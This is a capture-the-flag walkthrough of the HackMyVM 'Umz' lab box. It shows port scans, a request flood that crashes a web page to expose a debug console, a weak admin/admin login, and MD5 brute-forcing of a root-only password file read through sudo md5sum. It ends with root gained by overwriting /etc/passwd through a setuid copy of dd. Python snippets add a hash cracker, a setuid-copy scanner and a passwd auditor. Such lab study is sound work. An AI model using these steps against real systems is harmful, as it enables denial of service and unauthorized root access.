
HackMyVM-Umz

Hackmyvm Linux
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and keeps learning and growing.

Box Info

OS     Difficulty
Linux  Easy

Nmap

[root@kali] /home/kali/Umz  
❯ nmap 192.168.55.73 -sV -A -p-                                                                                                            
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: cyber fortress 9000
|_http-server-header: Apache/2.4.62 (Debian)

Dirsearch

[root@kali] /home/kali/Umz
❯ dirsearch -u http://192.168.55.73

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.73/

[02:39:29] Scanning:
[02:39:30] 403 -   278B - /.php
[02:39:38] 200 -    3KB - /index.html
[02:39:38] 200 -    3KB - /index.php
[02:39:38] 200 -    3KB - /index.php/login/
[02:39:43] 403 -   278B - /server-status/
[02:39:43] 403 -   278B - /server-status

Task Completed

Request Flood

Opening index.php, we can see that sending too many requests triggers some kind of protection mechanism.

[root@kali] /home/kali/Umz  
❯ curl http://192.168.55.73/index.php

<skip>

<body>
    <div class="container">
        <div class="alert">
            ⚠ DDoS Protection Active: This service is protected by automated anti-DDoS measures. 
            Excessive requests will trigger security protocols.
        </div>

        <h1 class="status-header">Resource Stress Test Interface</h1>
        
        <div class="load-indicator">
            <h2>Service Status Monitor</h2>
            <p>🟢 System Operational - Health Check Identifier: <strong>HEALTHY_STRING</strong></p>
        </div>

        <div class="calculation-summary">
            <h3>Prime Number Generation</h3>
            <p>Successfully generated prime numbers up to 
                <span class="prime-count">10000</span>
            </p>
            <p>Total primes calculated: <strong>1229</strong></p>
        </div>

        <div class="system-notice">
            <h3>Security Notice</h3>
            <p>This diagnostic interface is protected by multiple security layers:</p>
            <ul>
                <li>Automated traffic analysis</li>
                <li>Request rate limiting</li>
                <li>Connection fingerprinting</li>
            </ul>
        </div>
    </div>
</body>
</html>

A simple, brute-force way to trigger it is to run several FFUF instances against the page at the same time.


Nmap2

index.php then crashes. Scanning the ports again shows one extra port, 8080.

[root@kali] /home/kali/Umz  
❯ nmap 192.168.55.73 -sV -A -p-

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
8080/tcp open  http    Werkzeug httpd 1.0.1 (Python 3.9.2)
| http-title: Debug Console Login
|_Requested resource was http://192.168.55.73:8080/login

After logging in with the weak credentials admin/admin, the ping feature can be bypassed to execute arbitrary commands.


Own umzyyds

Check the sudo privileges:

welcome@Umz:~$ sudo -l
Matching Defaults entries for welcome on Umz:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Umz:
    (ALL) NOPASSWD: /usr/bin/md5sum

There is a password file under /opt:

welcome@Umz:/opt$ ls -al
total 12
drwxr-xr-x  3 root    root    4096 May  3 09:46 .
drwxr-xr-x 18 root    root    4096 Mar 18 20:37 ..
drwxr-xr-x  2 welcome welcome 4096 May  3 10:32 flask-debug
welcome@Umz:/opt$ cd flask-debug/
welcome@Umz:/opt/flask-debug$ ls -al
total 20
drwxr-xr-x 2 welcome welcome 4096 May  3 10:32 .
drwxr-xr-x 3 root    root    4096 May  3 09:46 ..
-rw-r--r-- 1 root    root    5001 May  3 10:23 flask_debug.py
-rwx------ 1 root    root      10 May  3 10:32 umz.pass

The file cannot be read directly, but sudo md5sum can hash it, so the idea is to get its MD5 and brute-force that hash against a wordlist.

Here is a script for that:

[root@kali] /home/kali/Umz  
❯ cat poc.sh
# Hash each rockyou candidate followed by a newline (umz.pass is 10 bytes, i.e. 9 characters plus "\n")
# and compare it with the hash of umz.pass obtained via sudo md5sum
while IFS= read -r line; do
        head -n 1 <<< "$line" | md5sum | grep -q "a963fadd7fd379f9bc294ad0ba44f659" && echo "Found: $line" && break
done < rockyou.txt

[root@kali] /home/kali/Umz  
❯ bash poc.sh 
Found: sunshine3

The password is sunshine3.
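Why NOPASSWD md5sum amounts to a read oracle for short secrets: a Python version of the check above, added here and not the author's script, that tries each candidate with and without a trailing newline (md5sum hashes the whole file, newline included) and, when the file size is known (umz.pass is 10 bytes), skips candidates that cannot match. The wordlist and the target hash in the demo are constructed; the real rockyou.txt and the hash from the box plug in the same way.

```python
import hashlib

def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

def crack_md5(target_hex: str, candidates, file_size=None):
    """Return (word, had_newline) for the first candidate whose MD5 equals
    target_hex, or None. Each word is tried as-is and with a trailing newline,
    because md5sum hashes the whole file, newline included. When file_size
    is known, candidates of the wrong length are skipped without hashing."""
    target_hex = target_hex.strip().lower()
    for word in candidates:
        word = word.rstrip("\r\n")       # wordlist lines carry their own newline
        raw = word.encode("utf-8")
        for suffix in (b"", b"\n"):
            data = raw + suffix
            if file_size is not None and len(data) != file_size:
                continue
            if md5_hex(data) == target_hex:
                return word, suffix == b"\n"
    return None

# Constructed stand-in for rockyou.txt (a real run would stream the file:
# crack_md5(target, open("rockyou.txt", encoding="latin-1"), file_size=10))
WORDLIST = ["123456\n", "password\n", "sunshine\n", "sunshine3\n", "iloveyou\n"]

if __name__ == "__main__":
    # Constructed target: the demo hashes a known value rather than the box's hash
    target = md5_hex(b"sunshine3\n")
    print(crack_md5(target, WORDLIST, file_size=10))
```

The defensive takeaway is the same whichever script is used: a NOPASSWD rule for any hashing or checksum tool lets the caller test guesses against every root-readable file.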

Root

A SUID binary is found in the home directory:

umzyyds@Umz:~$ ls -al
total 96
drwx------ 2 umzyyds umzyyds  4096 May  3 10:42 .
drwxr-xr-x 4 root    root     4096 May  3 10:27 ..
lrwxrwxrwx 1 root    root        9 May  3 10:38 .bash_history -> /dev/null
-rw-r--r-- 1 umzyyds umzyyds   220 May  3 10:27 .bash_logout
-rw-r--r-- 1 umzyyds umzyyds  3526 May  3 10:27 .bashrc
-rwsr-sr-x 1 root    root    76712 May  3 10:42 Dashazi
-rw-r--r-- 1 umzyyds umzyyds   807 May  3 10:27 .profile

Its help output looks just like that of dd:

umzyyds@Umz:~$ ./Dashazi --help
Usage: ./Dashazi [OPERAND]...
  or:  ./Dashazi OPTION
Copy a file, converting and formatting according to the operands.

  bs=BYTES        read and write up to BYTES bytes at a time (default: 512);
                  overrides ibs and obs
  cbs=BYTES       convert BYTES bytes at a time
  conv=CONVS      convert the file as per the comma separated symbol list
  count=N         copy only N input blocks
  ibs=BYTES       read up to BYTES bytes at a time (default: 512)
  if=FILE         read from FILE instead of stdin
  iflag=FLAGS     read as per the comma separated symbol list
  obs=BYTES       write BYTES bytes at a time (default: 512)
  of=FILE         write to FILE instead of stdout
  oflag=FLAGS     write as per the comma separated symbol list
  seek=N          skip N obs-sized blocks at start of output
  skip=N          skip N ibs-sized blocks at start of input
  status=LEVEL    The LEVEL of information to print to stderr;
                  'none' suppresses everything but error messages,
                  'noxfer' suppresses the final transfer statistics,
                  'progress' shows periodic transfer statistics

N and BYTES may be followed by the following multiplicative suffixes:
c =1, w =2, b =512, kB =1000, K =1024, MB =1000*1000, M =1024*1024, xM =M,
GB =1000*1000*1000, G =1024*1024*1024, and so on for T, P, E, Z, Y.

Each CONV symbol may be:

  ascii     from EBCDIC to ASCII
  ebcdic    from ASCII to EBCDIC
  ibm       from ASCII to alternate EBCDIC
  block     pad newline-terminated records with spaces to cbs-size
  unblock   replace trailing spaces in cbs-size records with newline
  lcase     change upper case to lower case
  ucase     change lower case to upper case
  sparse    try to seek rather than write the output for NUL input blocks
  swab      swap every pair of input bytes
  sync      pad every input block with NULs to ibs-size; when used
            with block or unblock, pad with spaces rather than NULs
  excl      fail if the output file already exists
  nocreat   do not create the output file
  notrunc   do not truncate the output file
  noerror   continue after read errors
  fdatasync  physically write output file data before finishing
  fsync     likewise, but also write metadata

Each FLAG symbol may be:

  append    append mode (makes sense only for output; conv=notrunc suggested)
  direct    use direct I/O for data
  directory  fail unless a directory
  dsync     use synchronized I/O for data
  sync      likewise, but also for metadata
  fullblock  accumulate full blocks of input (iflag only)
  nonblock  use non-blocking I/O
  noatime   do not update access time
  nocache   Request to drop cache.  See also oflag=sync
  noctty    do not assign controlling terminal from file
  nofollow  do not follow symlinks
  count_bytes  treat 'count=N' as a byte count (iflag only)
  skip_bytes  treat 'skip=N' as a byte count (iflag only)
  seek_bytes  treat 'seek=N' as a byte count (oflag only)

Sending a USR1 signal to a running 'dd' process makes it
print I/O statistics to standard error and then resume copying.

Options are:

      --help     display this help and exit
      --version  output version information and exit

Comparing it with dd confirms there is no difference (diff prints nothing):

umzyyds@Umz:~$ diff /usr/bin/dd ./Dashazi 
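Defensive check prompted by the Dashazi finding, written for this writeup and not the author's code: it lists setuid/setgid files under a directory and reports which trusted binary each one is a byte-for-byte copy of, which is exactly how a renamed setuid dd stands out. The demo builds a throwaway directory layout instead of touching the real system; a real scan would call find_suid_copies("/", "/usr/bin").

```python
import hashlib
import os
import stat
import tempfile

def sha256_of(path: str) -> str:
    """Content hash, streamed so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def is_setuid_or_setgid(path: str) -> bool:
    st = os.lstat(path)  # lstat: a symlink is not itself a setuid file
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))

def find_suid_copies(search_root: str, trusted_dir: str):
    """Return [(suid_path, trusted_path)] for each setuid/setgid file under
    search_root whose bytes equal some regular file in trusted_dir."""
    trusted = {}
    for name in os.listdir(trusted_dir):
        p = os.path.join(trusted_dir, name)
        if os.path.isfile(p) and not os.path.islink(p):
            trusted.setdefault(sha256_of(p), p)
    hits = []
    for dirpath, _, files in os.walk(search_root):
        for name in files:
            p = os.path.join(dirpath, name)
            if is_setuid_or_setgid(p):
                match = trusted.get(sha256_of(p))
                if match:
                    hits.append((p, match))
    return hits

def demo_constructed():
    """Constructed layout: a stand-in 'dd' under a fake /usr/bin and a setuid
    copy named Dashazi in a fake home; returns the basenames the scan reports."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir, home = os.path.join(tmp, "usr", "bin"), os.path.join(tmp, "home", "umzyyds")
        os.makedirs(bindir)
        os.makedirs(home)
        blob = b"\x7fELF-constructed-stand-in-for-dd"
        for path in (os.path.join(bindir, "dd"), os.path.join(home, "Dashazi")):
            with open(path, "wb") as f:
                f.write(blob)
        os.chmod(os.path.join(home, "Dashazi"), 0o4755)  # setuid, like -rwsr-sr-x on the box
        return [(os.path.basename(a), os.path.basename(b)) for a, b in find_suid_copies(home, bindir)]
```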

Use it to write a file: change the UID field of umzyyds in /etc/passwd to root (0).

umzyyds@Umz:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:1001:1001:,,,:/home/umzyyds:/bin/bash

umzyyds@Umz:~$ vim passwd
umzyyds@Umz:~$ cat passwd | ./Dashazi of=/etc/passwd
2+1 records in
2+1 records out
1436 bytes (1.4 kB, 1.4 KiB) copied, 0.00068782 s, 2.1 MB/s

umzyyds@Umz:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:0:0:,,,:/home/umzyyds:/bin/bash

Then simply log in again:

umzyyds@Umz:~$ su - umzyyds
Password: 
root@Umz:~# id
uid=0(root) gid=0(root) groups=0(root)
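The tampering above is easy to spot with a host-integrity check. This added example (not from the writeup) parses /etc/passwd and flags any non-root account with UID 0, any account whose primary group is 0, and any UID shared by several accounts; the sample is a constructed excerpt of the modified file shown above.

```python
from collections import defaultdict

# Constructed excerpt of /etc/passwd after the Dashazi write shown above
PASSWD_AFTER = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:0:0:,,,:/home/umzyyds:/bin/bash
"""

def parse_passwd(text: str):
    """Return [(name, uid, gid, home, shell)] for each well-formed line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append((name, int(uid), int(gid), home, shell))
    return entries

def audit_passwd(text: str):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    by_uid = defaultdict(list)
    for name, uid, gid, home, shell in parse_passwd(text):
        by_uid[uid].append(name)
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 but not root ({home}, {shell})")
        if uid != 0 and gid == 0:
            findings.append(f"{name}: primary group 0 (root)")
    for uid, names in by_uid.items():
        if len(names) > 1:
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_AFTER):
        print("ALERT:", finding)
```

In practice this belongs next to a file-integrity baseline (a stored hash of /etc/passwd), since the write itself, not just its result, is what an alert should fire on.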

Summary

User: a flood of requests crashes index.php, which exposes port 8080 and leads to command execution.

Root: read the password through sudo md5sum, then modify /etc/passwd to escalate privileges.
